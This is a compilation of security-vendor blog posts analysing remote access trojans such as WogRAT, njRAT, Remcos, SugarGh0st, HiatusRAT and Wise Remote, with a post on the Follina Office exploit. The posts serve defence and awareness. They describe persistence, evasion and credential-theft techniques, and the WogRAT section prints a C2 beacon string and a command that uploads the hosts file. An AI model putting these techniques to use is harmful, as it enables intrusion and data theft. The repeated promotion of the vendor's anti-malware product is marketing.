What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were first to detect and track the malware campaign. They additionally emphasize that this malicious program primarily targets Asian countries – China, Japan, Singapore and Hong Kong in the first place.

The strange thing about WogRAT is that its spreading campaigns were not detected, even though some of the methods were explained in the original research. Malware (more specifically – its loader) is disguised as a file posted on an online notepad service. Its naming supposes that frauds offer WogRAT as a system/program tweaking utility of some sort. This, in turn, supposes that initial spreading of the malware happens in “closed” places, like chats in messengers or the like.

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As I said, the original downloading from the aNotepad site gets only the malware loader in the encoded form. Upon execution, it compiles itself on the run and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source for the second-stage payload may differ.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP – the command used by the loader to compile itself

The downloaded file is a similar .NET assembly, encoded with Base64 and present as a text string on the source website. Loader decrypts the payload and loads it into the memory using process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by checking different registry keys and executing commands. In particular, it gathers info about network connections, system version, username and some of the info regarding system policies. Malware stacks this data with the info of its own process and sends it to the command server in the HTTP POST request. After that, malware switches to idle, waiting for the commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it is expecting to receive. The simplified formula consists of 3 elements, and looks like this:

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports 5 different types of operations: running specific files, downloading or uploading the files, altering the idle time, and terminating the execution. Not a huge list at the first glance, but in combination with different task types this gives a full-fledged backdoor functionality.

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it is in fact more reliant on the tricky spreading method and double-staged loader. Still, the amount of hooks it creates in the system makes it particularly hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to repel the RAT and all of its parts across the system.

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, that is categorized as backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, and before attacking, it allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

Such customization enables njRAT to circumvent many static checks called to avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously stand for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a Bladabindi performs some basic callouts to the command server. Depending on the response, malware can switch to the idle, start collecting user data or pull the additional payload from the remote server. The overall list of actions it can perform is the following:

• Executing remote shell commands
• Downloading and uploading files
• Capturing screenshots
• Logging keystrokes
• Camera and microphone access
• Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that antivirus often adds “!ml” to the end of its name – to indicate the use of the AI detection system. Although it is a highly effective method, without the confirmation from other detection systems, it is easy to make it generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware, it is best to detect and remove even the sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

The post Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Remcos RAT Uses Webhards to Spread

Recent research of South Korean cybersecurity firm AhnLab shares its observations regarding a new Remcos RAT spreading campaign. The company names Webhards as a source of choice for this malware to infiltrate user devices. Webhards is a file sharing platform, popular among computer pirates and people who seek free content. It may be used for legitimate purposes, though a selection of analysts name it a popular source of malware, along with torrents.

In the case of Remcos RAT, hackers use “hot topics” – either adult content or cracked versions of new games to make the user download the infected package. Then, the publication on the aforementioned site asks to run a Game.exe file, that is present in the downloaded archive. Upon running the executable file, a chain of VBS scripts are executed to download the final payload.

Upon downloading, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is, in fact, used only during the system installation and has no further application. Well, until this instance of Remcos finds its way to the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan, marketed as a legit remote access tool by German firm BreakingSecurity. Released in 2019, it has become particularly popular in 2020 and 2021, when threat actors were using Covid-themed emails to spread it. Later though, its activity has become much more moderate, averaging at 30 samples per day during 2023.

For functionality, this malware is a classic example of RAT: Remcos provides full-featured remote access to the infected system, including access to system menus and file system. Additionally, it is capable of recording the screen, taking screenshots and setting the activity alarm. To identify target systems from each other, malware collects some basic information – OS version, date, time, and some basic hardware info.

How to protect against threats?

By looking at the ways the malware spreads you can already get the answer on how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. As it is not just a malware risk but also a copyright infringement, avoiding it is pretty much recommended. This is especially relevant for websites that are known for being used for malware distribution.

For an additional, passive layer of protection, you can have anti-malware software running in the background. A modern, well-stocked antivirus can protect you from any attack, regardless of the type of malware. GridinSoft Anti-Malware is the one you can rely on – its detection system offers exceptional protection in both proactive and reactive approaches.

The post Remcos RAT Targets South Korean Users Through Webhards appeared first on Gridinsoft Blog.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers have uncovered a new wave of cyber threats targeting government entities in Uzbekistan and South Korea in recent cybersecurity developments. Utilizing a customized variant of the infamous Gh0st RAT, dubbed SugarGh0st, the campaign displays a sophisticated and multi-stage infection chain.

Targets were focused on foreign ministry personnel based on lures about investment projects, account credentials, and internal memos. These topics were selected as likely to entice victims to enable the malware unknowingly while viewing what seemed like legitimate work documents. Overall, the pick of targets point at the relationship of SugarGh0st’s masters to Chinese government.

Multi-stage infection chain

Once delivered through emails, the malicious documents trigger a multi-stage process to install SugarGh0st on systems.It is performed using JavaScript and shortcut files execute commands to drop the RAT executable, decrypt it, and activate full functionality in the background. Techniques like LotL binaries, side-loading DLLs, and abusing legitimate Windows utilities help mask the deployment from defenses and user detection. Aimed at foreign ministry networks, the operational security exhibits an adversary carefully honing its tradecraft before targeting sensitive agencies.

Following the installation, SugarGh0st offers advanced monitoring, exfiltration, and manipulation capabilities. This surpasses typical malware in commodity cybercrime operations. Functions allow recording keystrokes, activating webcams, executing files, or killing processes – all directed dynamically by attacker commands. Such comprehensive access risks the integrity of infected government agencies through unconstrained internal spying.

Depending on operational security practices, lateral movement could also jeopardize more comprehensive departments and ministry networks. While assessing the total damage remains challenging, the implications are clearly severe. Moreover, this has allowed stolen secrets to impact international affairs or relations.

A Gh0st RAT Variant and Potential Chinese Connection

While the attribution remains speculative, artifacts in the decoy documents hint at a potential Chinese-speaking actor. Two files within the campaign contain Chinese characters in their “last modified by” names, suggesting a linguistic connection to China. As the name suggests, SugarGh0st represents an evolution of existing Chinese-linked Gh0st RAT variants in circulation for over 15 years. Developed by the Chinese group 红狼小组 (C.Rufus Security Team), Gh0st RAT has been active since 2008.

SugarGh0st retains the core functionalities of its predecessor but features customized reconnaissance capabilities and a modified communication protocol. The malware granted threat actors total remote control to pillage confidential data from infected networks. Enhancements include:

• expanded anti-detection tactics
• reconnaissance commands tailored to harvest documents and credentials
• new communications disguising C2 servers as Google Drive domains

Attacks on government entities, particularly embassies and ministries, is not a new phenomenon. Countries spied on each other all the time, and the tools were the only difference. While other countries do not expose their software, Asian government-sponsored hackers seem to not be ashamed of their software. And Chinese and North Korean hackers appear to be among the most public ones.

The post SugarGh0st RAT Targets Uzbekistan and South Korea appeared first on Gridinsoft Blog.

US DoD and Taiwan Companies Cyberattacks

First, let’s clear out the attacks upon quite famed organisations and companies. The long-going cyberattack upon Taiwanese companies and at least one government organisation was detected as early as in August 2023. Lumen researchers who studied the botnet established by the HiatusRAT in the past noticed a new flow of connections that comes from Taiwan IP address zones. Soon after, =cyberattacks on chemical production facilities, semiconductor manufacturers and one municipality were uncovered.

The story around the U.S. Department of Defence is a bit different. Same research group detected traffic coming to the IP addresses associated with the botnet not only from Taiwan but also from the US. Specifically, they discovered that crooks who stand behind the RAT used one of its Tier 2 servers to connect to the DoD server dedicated to work with defence contracts. Fortunately, no deep penetration happened here, and hackers were most probably performing reconnaissance before further actions.

HiatusRAT Analysis

First thing that comes into view when you check the Hiatus is its network architecture. Instead of infecting endpoints, it targets networking devices – at least it was doing so since its emergence in late 2021. Routers are gateways for humongous amounts of information – and having complete control over it may sometimes give you much more than hacking the computers in the network. Though, nothing stops Hiatus from delivering additional payloads to the target systems. Aside from sniffing, such a network of compromised routers can also serve as a network of proxy servers that conceal the real IP address from the target server.

To spread the payload, hackers seek business-grade network routers with vulnerable firmware installed. Firstlings of the botnet were amongst Draytek routers, specifically Vigor 2960 and 3900. Nowadays, malware has builds capable of infecting routers with chipsets based on Arm, i386, x86-64 and MIPS/MIPS64 architectures. This sets up quite a large number of devices, as network infrastructure firmware updates are implemented even more reluctantly than patches to regular software.

Execution flow

The attack chain that enables the RAT injection into the router is not clear even nowadays. Though it is clear that upon gaining initial access, attackers execute a batch script that downloads the payload and an auxiliary utility. The latter is a specific version of a tcpdump, a command-line tool that allows for packet analysis.

Upon execution, the first thing to do for HiatusRAT is kicking out other processes that may be listening to the same 8816 port. If there are any, malware jams one first and proceeds with normal launching. Then, a kind-of-classic step comes: malware gathers basic information about the device it has started on. Among such data is information about its MAC address, architecture, firmware and kernel versions. It also gets precise information about the file system and all files that can potentially be stored in the internal memory.

Once malware is done with these checks, it reads a tiny JSON that contains what appears to be malware config. There, malware retrieves a C2 servers address. Aside from the “main” server, there is one used to receive all the packages gathered with the modified tcpdump tool. The first request to the control server is a classic HTTP POST that contains several fields, with basic system info gathered the step before.

HiatusRAT Functionality

I’ve already mentioned the tcpdump-like tool that supplies a significant part of the RAT functionality. However, it does not stop at this point. Hiatus can receive different commands from the command server, which alter its functionality or even force the malware to melt down. Thing is, some of these functions were not used to the moment, despite being available since the first release of the malware back in 2021.

How to protect against network infrastructure attacks?

Well, Hiatus used to aim at routers with some specific architecture and series, but now it covers quite a bit of possible variants. The ways hackers use to deploy this malware are still unclear, so there are not many reactive measures to figure out. Instead, I have several proactive advice for you to stick to.

Use advanced network protection solutions. Well, antivirus programs are not greatly effective at preventing this RAT infection. Meanwhile, network protection solutions, especially ones that are designed to bear on heuristics, can effectively detect and dispatch the intruder just by its behaviour. Network Detection and Response systems, conjoined with SOAR and UBA solutions, can show excellent results at protecting the environment against tricky malware attacks.

Update (or upgrade) your networking devices regularly. Since the key point of the malware injection is vulnerable router firmware, it is essential to keep it updated. Keep an eye on malware attacks that were executed with or via vulnerabilities in networking devices. Usually, device manufacturers release updates in a matter of weeks. Though, there could be unfortunate cases when some really old devices reach end-of-life and are not supported in any form. In this case, you are out for device updating – this is the best and most definite way to get rid of the hazard.

Keep a well-done anti-malware software on hand. I’ve just said that anti-malware programs are not very effective in this case, and I say it is nice to have – so inconsistent of me, isn’t it? The answer is no, as anti-malware programs will serve as a preventive mechanism for malware that HiatusRAT can deliver through its functionality. Multi-layer security structures are always harder to penetrate, at least without triggering the alarm.

The post HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military appeared first on Gridinsoft Blog.

Unveiling the Wise Remote Stealer

Revelations from cybersecurity experts have shed light on a concerning development in the underbelly of the internet—a burgeoning menace known as “Wise Remote“. This pernicious malware, operating as a Malware-as-a-Service (MaaS), has emerged as a highly adaptable and insidious tool. Its capabilities encompass remote access, DDoS botnet recruitment, data theft, and even extortion, raising the alarm for organizations and individuals alike.

The Stealthy Proliferation of Wise Remote Stealer

Since its initial appearance in early June, Wise Remote Stealer has been making waves across hacker forums such as HF and cracked-io. Its shadowy creators tirelessly refine and enhance their creation, showcasing its malevolence on platforms like Discord and Telegram. Disturbingly, these demonstrations have ensnared and impacted the lives of over a thousand unsuspecting victims, cementing its reputation as a significant threat.

Engineered using a combination of programming languages, including Go, C++, C#, and Python, Wise Remote primarily targets Windows systems—versions 8/10, and 11—in its crosshairs. Its developers exhibit an astute ability to elude conventional antivirus measures, employing various evasion techniques. To further cloak their operations, all communication with the command-and-control (C2) server, stationed in the secure confines of Switzerland, remains encrypted, ensuring anonymity.

The Tactical Ingenuity of Wise Remote

Wise Remote operates with calculated precision, showcasing a level of sophistication that sets it apart from other malicious tools. Through cloud-based module imports and strategic data storage within the victim’s disk, it carefully conceals its activities. Once the sensitive information has been exfiltrated, the malware meticulously erases all traces, leaving behind no digital footprints.

Subscribers to this nefarious service gain access to a comprehensive builder, allowing for customization and fine-tuning of the malware’s appearance and behavior. Remarkably, the resulting payloads rarely exceed 100 kilobytes, facilitating rapid dissemination and maximizing its reach.

The existing capabilities of Wise Remote Stealer are indeed alarming:

• Systematic collection of extensive system information, providing cybercriminals with a wealth of valuable data.
• Creation of a potent reverse shell, granting complete remote access and control over the compromised system.
• Facilitation of additional malicious file downloads and executions, enabling expansion of the attack surface.
• Extraction of critical data from web browsers, encompassing saved passwords, cookies, banking credentials, bookmarks, browsing history, and installed extensions, resulting in a treasure trove of personal information.
• Theft of funds from unsuspecting victims’ cryptocurrency wallets, inflicting significant financial damage.
• Seamless covert operation, opening and interacting with websites undetected, masquerading as legitimate user activity.
• Stealthy capture of screenshots, potentially compromising sensitive and confidential information.
• Utilization of the AppData folder as a discreet repository for surreptitiously uploaded files.
• Empowerment of attackers to customize and tailor malicious agents and modules to suit specific targets and preferred attack vectors.
• Camouflaging its tracks by manipulating system logs, erasing any trace of malicious activities, evading detection.

The Command Hub of Wise Remote

Serving as the central command hub, Wise Remote boasts a potent control panel that bestows unprecedented oversight and control over a vast network of up to 10,000 infected machines. With a single command, the operator can unleash devastating DDoS attacks or orchestrate a range of malicious activities, amplifying the disruptive potential of this malware.

As the cybersecurity community races to counter this emerging threat, the significance of Wise Remote becomes increasingly evident. Its adaptability, sophistication, and capacity for stealth underline the need for robust security measures and unwavering vigilance in today’s rapidly evolving digital landscape.

The post Wise Remote Trojan: Infostealer, RAT, DDoS Bot, and Ransomware appeared first on Gridinsoft Blog.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

• Use spyware and keyloggers to track the victim’s behavior
• Gain access to sensitive data, including social security numbers and credit card information
• View and record video from a webcam and microphone
• Take screenshots
• Format disks
• Download, change or delete files
• Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using RATs

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

• Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
• Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
• Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.

Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

• Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, ‘s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

• More strict firewall settings
• Safelisting IP addresses for authorized users
• Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT Malware) appeared first on Gridinsoft Blog.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina successfully, threat actors don’t require the use of macros to entice victims. Instead, they deploy a specially crafted Word Document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, threat actors employ HTML documents executed under WinWord. The execution initiates the msdt.exe process as a child process.

Registry protocol handler entry enables these processes. Subsequently, Sdiagnhost.exe gets activated, the Scripted Diagnostics Native Host that facilitates the creation of the final payload—in Follina’s case, PowerShell.

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.

Upon execution, this trojan verifies the presence of antivirus software. However, its primary function is to gather various system information, such as operating system details, executed paths, usernames, hardware identification, and transmit it to a command-and-control (C&C) server.

Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.

Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.

It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U government targets through a phishing campaign.

So far researchers have not identified which government was behind an attack.

Malicious emails of the phishing campaign contained alluring texts promising in fake recruitment pitches 20 percent boost in salary. To learn more recipients were urged to open an accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint in Twitter tweeted about the similar incident where about 10 company’s customers received over 1,000 messages with the same text.

The post Attackers Exploit MSDT Follina Bug to Drop RAT appeared first on Gridinsoft Blog.